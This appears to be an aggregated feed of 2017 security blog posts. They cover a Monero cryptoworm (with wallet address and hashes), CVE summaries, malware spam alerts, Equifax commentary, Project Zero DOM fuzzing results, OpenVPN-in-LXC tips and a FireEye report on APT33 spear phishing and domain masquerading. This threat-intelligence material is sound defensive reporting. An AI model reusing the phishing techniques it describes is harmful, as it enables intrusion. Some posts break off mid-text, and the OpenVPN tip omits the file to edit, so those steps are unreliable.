- Monero Address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
- Sha256: 19e15a4288e109405f0181d921d3645e4622c87c4050004357355b7a9bf862cc
- Sha256: 038d4ef30a0bfebe3bfd48a5b6fed1b47d1e9b2ed737e8ca0447d6b1848ce309


We are facing one of the first complex delivery of cryptocoin mining Malware. Everybody knows about CryptoMine, BitCoinMiner and Adylkuzz Malware which basically dropped on the target machine a BitCoin Miner, so if you are wondering: Why Marco do you write: "one of the first Malware" ? Well actually I wrote one of the "first complex" delivery. Usual coins Malware are delivered with no propagation modules, with no exploiting module and with not file-less techniques. In fact, the way this Monero CPU Miner has been delivered, includes advanced methodologies of memory inflation, where the unpacked Malware is not saved on Hard Drive (a technique to bypass some Anti Virus) but it is inflated directly on memory and called directly from memory itself. 

We can consider this Malware as a last generation of -all in memory- CryptoWorm. 

Another interesting observation, at least on my personal point of view, comes from the first stage. Why the attacker included this useless stage ? It appears to be not useful at all, it's a mere dropper wth no controls nor evasions. The attacker could have delivered just the second stage within the first stage in it, assuring a more stealth network fingerprint. So why the attacker decided to deliver the CryptoWorm through the first stage ? Maybe the first stage is part of a bigger framework ? Are we facing a new generation of Malware Generator Kits ? 

I wont really answering to such a questions right now, but contrary I'd like to take my readers thinking about it.

Have fun

Cryptopp Crypto++ 5.6.4 octets Remote Code Execution Vulnerability

Crypto++ (aka cryptopp and libcrypto++) 5.6.4 contained a bug in its ASN.1 BER decoding routine. The library will allocate a memory block based on the length field of the ASN.1 object. If there is not enough content octets in the ASN.1 object, then the function will fail and the memory block will be zeroed even if its unused. There is a noticeable delay during the wipe for a large allocation.

Phpipam 1.2 Execute Code Cross Site Scripting Vulnerability

Multiple Cross-Site Scripting (XSS) issues were discovered in phpipam 1.2. The vulnerabilities exist due to insufficient filtration of user-supplied data passed to several pages (instructions in app/admin/instructions/preview.php; subnetId in app/admin/powerDNS/refresh-ptr-records.php). An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website.

QOTD – SEC Chair Clayton on Cyber Risk Disclosures

[W]e are continuing to examine whether public companies are taking appropriate action to inform investors, including after a breach has occurred, and we will investigate issuers that mislead investors about material cybersecurity risks or data breaches.
-- Jay Clayton, SEC Chair 

Src: Written Remarks before the Committee on Banking, Housing and Urban Development United States Senate, September 26, 2017

Malware spam: "AutoPosted PI Notifier"

This spam has a .7z file leading to Locky ransomware. From:      "AutoPosted PI Notifier" [NoReplyMailbox@redacted.tld] Subject:      Invoice PIS9344608 Date:      Tue, September 26, 2017 5:29 pm Please find Invoice PIS9344608 attached. The number referenced in the spam varies, but attached is a .7z archive file with a matching filename. In turn, this contains one of a number of malicious VBS

“Preparing for Cyber Security Incidents”

This blog post was written by ICS515 instructor,Kai Thomsen. Talk with any incident responder and you'll learn that there are a few less glamorous parts of the job. Writing the final report and preparation in advance to an incident are probably top contenders. In this article I want to focus on preparation and explain to … Continue reading Preparing for Cyber Security Incidents

Hyperbole in Breach Reporting

While reading the news this morning about yet another successful data breach, I couldn't help but wonder if the hyperbole used in reporting about data breaches is stifling our ability to educate key stakeholders on what they really need to know.

Today's example is about a firm that many rely on for security strategy, planning, and execution. The article I read stated that they were "targeted by a sophisticated hack" but later explains that the attacker compromised a privileged account that provided unrestricted "access to all areas". And, according to sources, the account only required a basic password with no two-step or multi-factor authentication. That doesn't sound too sophisticated, does it? Maybe they brute-forced it, or maybe they just guessed the password (or found it written down in an office?)

It reminded me of an attack on a security vendor back in 2011. As I recall, there was a lot of talk of the sophistication and complexity of the attack. It was called an Advanced Persistent Threat (and maybe some aspects of it were advanced). But, when the facts came out, an employee simply opened an email attachment that introduced malware into the environment - again, not overly sophisticated in terms of what we think a hack to be.

The quantity, availability, and effectiveness of attack techniques are enough to make anyone uncomfortable with their security posture. I previously wrote about a German company who, in a breach response, wrote that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." CISOs are being told that they should expect to be breached. The only questions are about when and how to respond. It makes you feel like there's no hope; like there's no point in trying.

However, if you look at the two examples above that were described as highly sophisticated, they may have been avoided with simple techniques such as employee education, malware detection, and multi-factor authentication. I don't mean to over-simplify. I'm not saying it's all easy or that these companies are at-fault or negligent. I'm just calling for less hyperbole in the reporting. Call out the techniques that help companies avoid similar attacks. Don't describe an attack as overly sophisticated if it's not. It makes people feel even more helpless when, perhaps, there are some simple steps that can be taken to reduce the attack surface.

I'd also advocate for more transparency from those who are attacked. Companies shouldn't feel like they have to make things sound more complicated or sophisticated than they are. There's now a growing history of reputable companies (including in the security industry) who have been breached. If you're breached, you're in good company. Let's talk in simple terms about the attacks that happen in the real world. An "open kimono" approach will be more effective at educating others in prevention. And again, less hyperbole - we don't need to overplay to emotion here. Everyone is scared enough. We know the harsh reality of what we (as security professionals) are facing. So, let's strive to better understand the real attack surface and how to prioritize our efforts to reduce the likelihood of a breach.

QOTD – Raskin on Cybersecurity as Shared Responsibility

Understanding and dealing with the cyber threat has, due to your efforts, seeped from the IT shop and into the CEO shop.  Responsibility is now shared. In fact, this new shared responsibility, among IT experts, the CEO, and the board of directors, has been the most noticeable trend in governance from my time in the industry, in state government, and in the federal government.  Bankers rarely used to talk to me much about cybersecurity.  Now, this is one topic that comes up every day.
-- Treasury Deputy Secretary Sarah Bloom Raskin

Src: Remarks of Deputy Secretary Raskin at The Texas Bankers’ Association Executive Leadership Cybersecurity Conference

The Hay CFP Management Method

By Andrew Hay, Co-Founder and CTO, LEO Cyber Security.

I speak at a lot of conferences around the world. As a result, people often ask me how I manage the vast number of abstracts and security call for papers (CFPs) submissions. So I thought I’d create a blog post to explain my process. For lack of a better name, let’s call it the Hay CFP Management Method. It should be noted that this method could be applied to any number of things from blog posts to white papers and scholastic articles to news stories. I have successfully proven this methodology for both myself and my teams at OpenDNS, DataGravity, and LEO Cyber Security. Staying organized helped manage the deluge of events, submitted talks, and important due dates in addition to helping me keep track of where in the world my team was and what they were talking about.

I, like most people, started managing abstracts and submissions by relying on email searches and documents (both local and on Google Drive, Dropbox, etc.). Unfortunately, I didn’t find this scaled very well as I kept losing track of submitted vs. accepted/rejected talks and their corresponding dates. It certainly didn’t scale when it was applied to an entire team as opposed to a single individual.

Enter Trello, a popular (and freemium) web-based project management application that utilizes the Kanban methodology for organizing projects (boards), lists (task lists), and tasks (cards). In late September I start by creating a board for the upcoming year (let’s call this board the 2018 Conference CFP Calendar) and, if not already created, a board to track my abstracts in their development lifecycle (let’s call this board Talk Abstracts).

Within the Talk Abstracts board, I create several lists to act as swim lanes for my conference abstracts and other useful information. These lists are:

* Development: These are talks that are actively being developed and are not yet ready for prime time.
* Completed: These are talks that have finished development and are ready to be delivered at an upcoming event.
* Delivered: These are talks that have been delivered at least once.
* Misc: This list is where I keep my frequently requested form information such as my short bio (less than 50 characters), long bio (less than 1,500 characters), business mailing address (instead of browsing to your corporate website every time), and CISSP number (because who can remember that?).
* Retired: As a personal rule, I only use a particular talk for one calendar year. When I feel as though the talk is stale, boring, or stops being accepted, I move the card to this list. That’s not to say you can’t revive a talk or topic in the future as a “version 2.0”. This is why keeping the card around is valuable.

Within the 2018 Conference CFP Calendar board, I create several lists to act as swim lanes for my various CFPs. These lists are:

* CFP open: This is where I put all of the upcoming conference cards that I know about even if I do not yet know the exact details (such as location, CFP open/close, etc.).
* CFP closes in < 30 days: This is where I put the upcoming conference cards that have a confirmed closing date within the next 30 days. Note, it is very important to record details in the cards such as closing date, conference CFP mechanism (e.g. email vs. web form), and any related URLs for the event.
* Submitted: These are the conferences that I have submitted to and the associated cards. Note, I always provide a link to the abstract I submitted as a way to remind myself what I’m talking about.
* Accepted: These are the accepted talk cards. Note, I always put a copy of the email (or link to) acceptance notification to record any details that might be important down the road. I also make sure to change the date on the card to that of the speaking date and time slot to help keep me organized.
* Attending but not presenting: This is really a generic catch-all for events that I need to be at but may not be speaking at (e.g. booth duty, attending training, etc.). The card and associated dates help keep my dance card organized.
* Accepted but backed out: Sometimes life happens. This list contains cards of conference submissions that I had to back out of for one reason or another. I keep these cards in their own column to show me what was successfully accepted and might be a fit for next year in addition to the reason I had to back out (e.g. conflict, personal issue, alien abduction, etc.).
* Completed: This list is for completed talk cards. Again, I keep these to reference for next year’s board as it provides some ballpark dates for when the CFP opens, closes, as well as the venue and conference date.
* Rejected: They’re not all winners and not everybody gets every talk accepted. In my opinion, keeping track of your rejected talks is as (if not more) important as keeping track of your accepted talks. Not only does it allow you to see what didn’t work for that particular event, but it also allows you to record reviewer feedback on the submission and maybe submit a different style or type of abstract in the future.
* Not doing 2018: This is the list where I put conference cards that I’ve missed the deadline on (hey, it happens), cannot submit to because of a conflict, or simply choose to not submit a talk to.

It should be noted that I keep the above lists in the same order every year to help minimize my development time against the Trello API for my visualization dashboard (which I will explain in a future blog post). This might sound like a lot of work but once you’ve set this board up you can reuse it every year. In fact, it’s much easier to copy last year’s board than starting fresh every year, as it brings the cards and details over. Then all you need to do is update the old cards with the new venue, dates, and URLs.

Now that we have our board structure created we need to start populating the lists with the cards – which I’ll explain in the next blog post. In addition to the card blog post, I’ll explain two other components of the process in subsequent posts. For reference, here are the upcoming blog posts that will build on this one:

* Individual cards and their structure
* Moving cards through the pipeline
* Visualizing your board (and why it helps)

The post The Hay CFP Management Method appeared first on LEO Cyber Security.

Startup Security Weekly #56 – A Huge Week

Don Pezet and Tim Broom of ITProTV join us. In the news, building successful products, the most important startup question, and updates from McAfee, Slack, ThreatStack, and more on this episode of Startup Security Weekly!Full Show Notes: for all the latest episodes!

QOTD – Admiral Rogers on Cyber War

Cyber war is not some future concept or cinematic spectacle, it is real and here to stay.
Conflict in the cyber domain is not simply a continuation of kinetic operations by digital means, nor is it some Science Fiction clash of robot armies.

-- Admiral Michael Rogers, Commander of US Cyber Command,
Testimony before US House Committee on Armed Service (May 2017)

Src: Docs.House.Gov

A Change In Context

Today marks the end of my first week in a new job. As of this past Monday, I am now a Manager, Security Engineering, with Pearson. I'll be handling a variety of responsibilities, initially mixed between security architecture and team management. I view this opportunity as a chance to reset my career after the myriad challenges experienced over the past decade. In particular, I will now finally be able to say I've had administrative responsibility for personnel, lack of which having held me back from career progression these past few years.

This change is a welcome one, and it will also be momentous in that it will see us leaving the NoVA/DC area next Summer. The destination is not finalized, but it seems likely to be Denver. While it's not the same as being in Montana, it's the Rockies and at elevation, which sounds good to me. Not to mention I know several people in the area and, in general, like it. Which is not to say that we dislike where we live today (despite the high price tag). It's just time for a change of scenery.

I plan to continue writing on the side here (and on LinkedIn), but the pace of writing may slow again in the short-term while I dedicate most of my energy to ramping up the day job. The good news, however, is this will afford me the opportunity to continue getting "real world" experience that can be translated and related in a hopefully meaningful manner.

Until next time, thanks and good luck!

The Great DOM Fuzz-off of 2017

Posted by Ivan Fratric, Project Zero


Historically, DOM engines have been one of the largest sources of web browser bugs. And while in the recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox’s DOM implementation, specifically the part that handles SVG elements in a web page. It is also a rare case that a vendor will publish a security update that doesn’t contain fixes for at least several DOM engine bugs.

An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers as well as browser vendors who care about security invest into building DOM fuzzers and associated infrastructure.

As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing.

The fuzzer

For this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I’m open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extendible and can be reused by myself as well as other researchers for fuzzing other targets besides just DOM fuzzing.

We named this new fuzzer Domato (credits to Tavis for suggesting the name). Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions.

The fuzzer consists of several parts:
  • The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing.
  • The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part.
  • A set of grammars for generating HTML, CSS and JavaScript code.

One of the most difficult aspects in the generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach:

  1. I initially extracted DOM API declarations from .idl files in Google Chrome Source. Similarly, I parsed Chrome’s layout tests to extract common (and not so common) names and values of various HTML and CSS properties.
  2. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior. One example of this are functions and properties that take strings as input: Just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property.

Otherwise, Domato supports features that you’d expect from a DOM fuzzer such as:
  • Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers
  • Implicit (through grammar definitions) support for “interesting” APIs (e.g. the Range API) that have historically been prone to bugs.

Instead of going into much technical details here, the reader is referred to the fuzzer code and documentation at It is my hope that by open-sourcing the fuzzer I would invite community contributions that would cover the areas I might have missed in the fuzzer or grammar creation.


We tested 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100.000.000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100.000.000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the pay range of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptable VMs (which I think work well for fuzzing jobs as they don’t need to be up all the time) and 10 seconds per run.

Here are additional details of the fuzzing setup for each browser:

  • Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds.

  • Mozilla Firefox was fuzzed on internal Google infrastructure (linux based). Since Mozilla already offers Firefox ASAN builds for download, we used that as a fuzzing target. Each crash was additionally verified against a release build.

  • Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of ASAN build, page heap was applied to iexplore.exe process to make it easier to catch some types of issues.

  • Microsoft Edge was the only browser we couldn’t easily fuzz on Google infrastructure since Google Compute Engine doesn’t support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That’s why for fuzzing it we created a virtual cluster of Windows 10 VMs on Microsoft Azure. Same as with Internet Explorer, page heap was applied to MicrosoftEdgeCP.exe process before fuzzing.

  • Instead of fuzzing Safari directly, which would require Apple hardware, we instead used WebKitGTK+ which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac.


Without further ado, the number of security bugs found in each browsers are captured in the table below.

Only security bugs were counted in the results (doing anything else is tricky as some browser vendors fix non-security crashes while some don’t) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don’t know if bugs in development version would be caught by internal review and fuzzing process before release).

Number of Bugs
Project Zero Bug IDs
994, 1024
1130, 1155, 1160, 1185
Internet Explorer
1011, 1076, 1118, 1233
1011, 1254, 1255, 1264, 1301, 1309
999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250
*While adding the number of bugs results in 33, 2 of the bugs affected multiple browsers
**The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count here.

All of the bugs listed here have been fixed in the current shipping versions of the browsers. As can be seen in the table most browsers did relatively well in the experiment with only a couple of security relevant crashes found. Since using the same methodology used to result in significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser’s DOM engine is better or worse than another.

However, Apple Safari is a clear outlier in the experiment with significantly higher number of bugs found. This is especially worrying given attackers’ interest in the platform as evidenced by the exploit prices and recent targeted attacks. It is also interesting to compare Safari’s results to Chrome’s, as until a couple of years ago, they were using the same DOM engine (WebKit). It appears that after the Blink/Webkit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit.

It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of a useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft’s team behind it!

When interpreting the results, it is very important to note that they don’t necessarily reflect the security of the whole browser and instead focus on just a single component (DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as presence and security of a sandbox, bugs in other components such as scripting engines etc. I can also not disregard the possibility that, within DOM, my fuzzer is more capable at finding certain types of issues than other, which might have an effect on the overall stats.

Experimenting with coverage-guided DOM fuzzing

Since coverage-guided fuzzing seems to produce very good results in other areas we wanted to combine it with the DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and used a modified WinAFL's DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows:

  1. The fuzzer generates a new set of samples by mutating existing samples in the corpus.
  2. The fuzzer spawns IE process which opens a harness HTML page.
  3. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe
  4. After the sample executes, it notifies the harness which notifies the fuzzer to stop collecting coverage.
  5. Coverage map is examined and if it contains unseen coverage, the corresponding sample is added to the corpus.
  6. Go to step 3 until all samples are executed or the IE process crashes
  7. Periodically minimize the corpus using the AFL’s cmin algorithm.
  8. Go to step 1.

The following set of mutations was used to produce new samples from the existing ones:

  • Adding new CSS rules
  • Adding new properties to the existing CSS rules
  • Adding new HTML elements
  • Adding new properties to the existing HTML elements
  • Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them.

Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way.


As stated before, DOM engines have been one of the largest sources of web browser bugs. While this type of bug are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product’s security posture.

The big question at the end is: Are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts.

Tips / Solutions for settings up OpenVPN on Debian 9 within Proxmox / LCX containers

When I tried to migrate my OpenVPN setup to a container on my new Proxmox server I run into multiple problems, where searching through the Internet provided solutions that did not work or were out of date. So I thought I put everything one needs to setup OpenVPN on Debian 9 within a Proxmox / LXC container together in one blog post.


Getting a TUN device into the unprivileged container

As you really should run container in unprivileged mode the typical solutions with adding/allowing

lxc.cgroup.devices.allow: c 10:200 rwm

won’t work. And running a container in privileged mode is a bad bad idea, but gladly there is a native LXC solution.

Stop the container with

pct stop <containerid>

Add following line to /etc/pve/lxc/<containerid>.conf

lxc.mount.entry = /dev/net/tun dev/net/tun none bind,create=file

start the container with

pct start <containerid>

OpenVPN will now be able to create a tun device. Just do a test run with

openvpn --config /etc/openvpn/blabla.conf


Add OpenVPN config files to the “autostart”

You need to put the OpenVPN files into /etc/openvpn/ with the extension .conf. And if you add a new file you need to run

systemctl daemon-reload

before doing a service openvpn restart.

Changes in existing config files don’t need the systemd reload.


Getting systemd to start openvpn within a unprivileged container

So OpenVPN works now manually but not with the “init” script. You see following error message in the log file
daemon() failed or unsupported: Resource temporarily unavailable (errno=11)

To solve this edit


and but a # in front of


now reload systemd with

systemctl daemon-reload

and it should work.


Hope that info/tips helped you to solve the problems faster than I did. 🙂 If you know some other tips / solutions for running OpenVPN in a Debian 9 container withing LXC / Proxmox write a comment! Thx!

Enterprise Security Weekly #62 – Heat Death of the Universe

Paul and John discuss insights into the Equifax data breach. In the news, CyberGRX and BitSight join forces, YARA rules explained, Riverbed teases an application networking offering, and more on this episode of Enterprise Security Weekly!Full Show Notes:

Visit for all the latest episodes!

Malware spam: "Invoice RE-2017-09-21-00xxx" from "Amazon Marketplace"

This fake Amazon spam comes with a malicious attachment: Subject:       Invoice RE-2017-09-21-00794 From:       "Amazon Marketplace" [] Date:       Thu, September 21, 2017 9:21 am Priority:       Normal ------------- Begin message ------------- Dear customer, We want to use this opportunity to first say "Thank you very much for your purchase!"

Encryption would NOT have saved Equifax

I read a few articles this week suggesting that the big question for Equifax is whether or not their data was encrypted. The State of Massachusetts, speaking about the lawsuit it filed, said that Equifax "didn't put in safeguards like encryption that would have protected the data." Unfortunately, encryption, as it's most often used in these scenarios, would not have actually prevented the exposure of this data. This breach will have an enormous impact, so we should be careful to get the facts right and provide as much education as possible to law makers and really to anyone else affected.

We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.

I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.

Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.

The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.

Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.

100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.

Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware

When discussing suspected Middle Eastern hacker groups with destructive capabilities, many automatically think of the suspected Iranian group that previously used SHAMOON – aka Disttrack – to target organizations in the Persian Gulf. However, over the past few years, we have been tracking a separate, less widely known suspected Iranian group with potential destructive capabilities, whom we call APT33. Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.

Recent investigations by FireEye’s Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of APT33’s operations, capabilities, and potential motivations. This blog highlights some of our analysis. Our detailed report on FireEye MySIGHT contains a more thorough review of our supporting evidence and analysis. We will also be discussing this threat group further during our webinar on Sept. 21 at 8 a.m. ET.


APT33 has targeted organizations – spanning multiple industries – headquartered in the United States, Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.

From mid-2016 through early 2017, APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings.

During the same time period, APT33 also targeted a South Korean company involved in oil refining and petrochemicals. More recently, in May 2017, APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company.

We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis a vis Saudi Arabia.

We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies. Iran has expressed interest in growing their petrochemical industry and often posited this expansion in competition to Saudi petrochemical companies. APT33 may have targeted these organizations as a result of Iran’s desire to expand its own petrochemical production and improve its competitiveness within the region. 

The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups, indicating a common interest in the sectors across Iranian actors.

Figure 1 shows the global scope of APT33 targeting.

Figure 1: Scope of APT33 Targeting

Spear Phishing

APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals.

An example .hta file excerpt is provided in Figure 2. To the user, the file would appear as benign references to legitimate job postings; however, unbeknownst to the user, the .hta file also contained embedded code that automatically downloaded a custom APT33 backdoor.

Figure 2: Excerpt of an APT33 malicious .hta file

We assess APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send hundreds of spear phishing emails to targeted individuals in 2016. Many of the phishing emails appeared legitimate – they referenced a specific job opportunity and salary, provided a link to the spoofed company’s employment website, and even included the spoofed company’s Equal Opportunity hiring statement. However, in a few cases, APT33 operators left in the default values of the shell’s phishing module. These appear to be mistakes, as minutes after sending the emails with the default values, APT33 sent emails to the same recipients with the default values removed.

As shown in Figure 3, the “fake mail” phishing module in the ALFA Shell contains default values, including the sender email address (solevisible@gmail[.]com), subject line (“your site hacked by me”), and email body (“Hi Dear Admin”).

Figure 3: ALFA TEaM Shell v2-Fake Mail (Default)

Figure 4 shows an example email containing the default values the shell.

Figure 4: Example Email Generated by the ALFA Shell with Default Values

Domain Masquerading

APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training, maintenance and support for Saudi’s military and commercial fleet. Based on observed targeting patterns, APT33 likely used these domains in spear phishing emails to target victim organizations.    

The following domains masquerade as these organizations: Boeing, Alsalam Aircraft Company, Northrop Grumman Aviation Arabia (NGAAKSA), and Vinnell Arabia.






Boeing, Alsalam Aircraft company, and Saudia Aerospace Engineering Industries entered into a joint venture to create the Saudi Rotorcraft Support Center in Saudi Arabia in 2015 with the goal of servicing Saudi Arabia’s rotorcraft fleet and building a self-sustaining workforce in the Saudi aerospace supply base.

Alsalam Aircraft Company also offers military and commercial maintenance, technical support, and interior design and refurbishment services.

Two of the domains appeared to mimic Northrop Grumman joint ventures. These joint ventures – Vinnell Arabia and Northrop Grumman Aviation Arabia – provide aviation support in the Middle East, specifically in Saudi Arabia. Both Vinnell Arabia and Northrop Grumman Aviation Arabia have been involved in contracts to train Saudi Arabia’s Ministry of National Guard.

Identified Persona Linked to Iranian Government

We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries.

We assess an actor using the handle “xman_1365_x” may have been involved in the development and potential use of APT33’s TURNEDUP backdoor due to the inclusion of the handle in the processing-debugging (PDB) paths of many of TURNEDUP samples. An example can be seen in Figure 5.

Figure 5: “xman_1365_x" PDB String in TURNEDUP Sample

Xman_1365_x was also a community manager in the Barnamenevis Iranian programming and software engineering forum, and registered accounts in the well-known Iranian Shabgard and Ashiyane forums, though we did not find evidence to suggest that this actor was ever a formal member of the Shabgard or Ashiyane hacktivist groups.

Open source reporting links the “xman_1365_x” actor to the “Nasr Institute,” which is purported to be equivalent to Iran’s “cyber army” and controlled by the Iranian government. Separately, additional evidence ties the “Nasr Institute” to the 2011-2013 attacks on the financial industry, a series of denial of service attacks dubbed Operation Ababil. In March 2016, the U.S. Department of Justice unsealed an indictment that named two individuals allegedly hired by the Iranian government to build attack infrastructure and conduct distributed denial of service attacks in support of Operation Ababil. While the individuals and the activity described in indictment are different than what is discussed in this report, it provides some evidence that individuals associated with the “Nasr Institute” may have ties to the Iranian government.

Potential Ties to Destructive Capabilities and Comparisons with SHAMOON

One of the droppers used by APT33, which we refer to as DROPSHOT, has been linked to the wiper malware SHAPESHIFT. Open source research indicates SHAPESHIFT may have been used to target organizations in Saudi Arabia.

